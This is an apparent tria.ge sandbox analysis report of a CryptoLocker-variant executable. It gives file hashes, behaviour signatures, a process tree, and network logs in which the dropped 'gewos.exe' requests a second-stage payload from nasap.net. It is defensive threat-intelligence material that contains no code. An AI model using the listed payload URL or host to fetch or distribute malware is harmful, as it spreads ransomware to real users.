Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2024-02-25...er.exe

windows7-x64

9

2024-02-25...er.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/02/2024, 02:27 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-02-25_2220829d980abd0ac0e2efcc96e03306_cryptolocker.exe

  • Size

    43KB

  • MD5

    2220829d980abd0ac0e2efcc96e03306

  • SHA1

    b7e945f0b4f49d2f71a78d06f3e8bface7acf59e

  • SHA256

    678cb015766ef42bfb1fb94f72dbe5c904aaea1ad99461b92d3447188c202fc8

  • SHA512

    c6d65ece8ccaa0d98746358a26f92602bfb2d550c0770227a5399f5589f9ad2f761105d5a3664f716ee77be1caab4469955a7766cc6e35bdf0180e7d5ec06296

  • SSDEEP

    768:btB9g/WItCSsAGjX7r3BPOMHocM4vUUOmJ+96eg1lL:btB9g/xtCSKfxLIcMzUw96DL

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-02-25_2220829d980abd0ac0e2efcc96e03306_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-02-25_2220829d980abd0ac0e2efcc96e03306_cryptolocker.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4592
    • C:\Users\Admin\AppData\Local\Temp\gewos.exe
      "C:\Users\Admin\AppData\Local\Temp\gewos.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      PID:4988

Network

  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    26.35.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.35.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    nasap.net
    IN A
    Response
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    GET
    https://nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: nasap.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Sun, 25 Feb 2024 02:27:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Cache-Enabled: False
    X-Redirect-By: WordPress
    Location: https://www.nasap.net/config/8mo.exe
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: W301 NC:000000 UP:
  • flag-us
    DNS
    5.119.212.35.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.119.212.35.in-addr.arpa
    IN PTR
    Response
    5.119.212.35.in-addr.arpa
    IN PTR
    511921235bcgoogleusercontentcom
  • flag-us
    DNS
    226.20.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    226.20.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    www.nasap.net
    IN A
    Response
    www.nasap.net
    IN CNAME
    nasap.net
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    GET
    https://www.nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Cache-Control: no-cache
    Host: www.nasap.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sun, 25 Feb 2024 02:27:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Cache-Enabled: False
    Link: <https://www.nasap.net/index.php/wp-json/>; rel="https://api.w.org/"
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: W NC:000000 UP:
  • flag-us
    DNS
    26.165.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.165.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.135.221.88.in-addr.arpa
    IN PTR
    Response
    217.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-217deploystaticakamaitechnologiescom
  • flag-us
    DNS
    194.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.178.17.96.in-addr.arpa
    IN PTR
    Response
    194.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-194deploystaticakamaitechnologiescom
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    8.179.89.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.179.89.13.in-addr.arpa
    IN PTR
    Response
  • 35.212.119.5:443
    https://nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    1.1kB
     5.7kB
     13
    10

    HTTP Request

    GET https://nasap.net/config/8mo.exe

    HTTP Response

    301
  • 35.212.119.5:443
    https://www.nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    3.6kB
     81.1kB
     67
    64

    HTTP Request

    GET https://www.nasap.net/config/8mo.exe

    HTTP Response

    404
  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    26.35.223.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    26.35.223.20.in-addr.arpa

  • 8.8.8.8:53
    nasap.net
    dns
    gewos.exe
    55 B
     71 B
     1
    1

    DNS Request

    nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    5.119.212.35.in-addr.arpa
    dns
    71 B
     122 B
     1
    1

    DNS Request

    5.119.212.35.in-addr.arpa

  • 8.8.8.8:53
    226.20.18.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    226.20.18.104.in-addr.arpa

  • 8.8.8.8:53
    www.nasap.net
    dns
    gewos.exe
    59 B
     89 B
     1
    1

    DNS Request

    www.nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    26.165.165.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    26.165.165.52.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    217.135.221.88.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    217.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    194.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    194.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    8.179.89.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    8.179.89.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\gewos.exe
    Filesize

    43KB

    MD5

    bd5c09f7c2dc540c17b343483cc483f4

    SHA1

    07d8d9da799d0bbb903db9f05f47ae31968a49af

    SHA256

    20a3d29a322bb13daf9e908a91ed1e932b3c9e36e828a71e3b34a6b02e6d2e5e

    SHA512

    17811433959f6132810ea8b4e8f066a5a86ed07d9ecd5c128f25fde7e6f8a21b6a93e65fc6ebf9ee6f8395be68f92c0a7ebbeea3e745653b9447249083eedaf1

    Download Submit

  • memory/4592-0-0x0000000002340000-0x0000000002346000-memory.dmp

    Filesize

    24KB

    Download

  • memory/4592-1-0x0000000002340000-0x0000000002346000-memory.dmp

    Filesize

    24KB

    Download

  • memory/4592-2-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

    Download

  • memory/4988-20-0x0000000002250000-0x0000000002256000-memory.dmp

    Filesize

    24KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.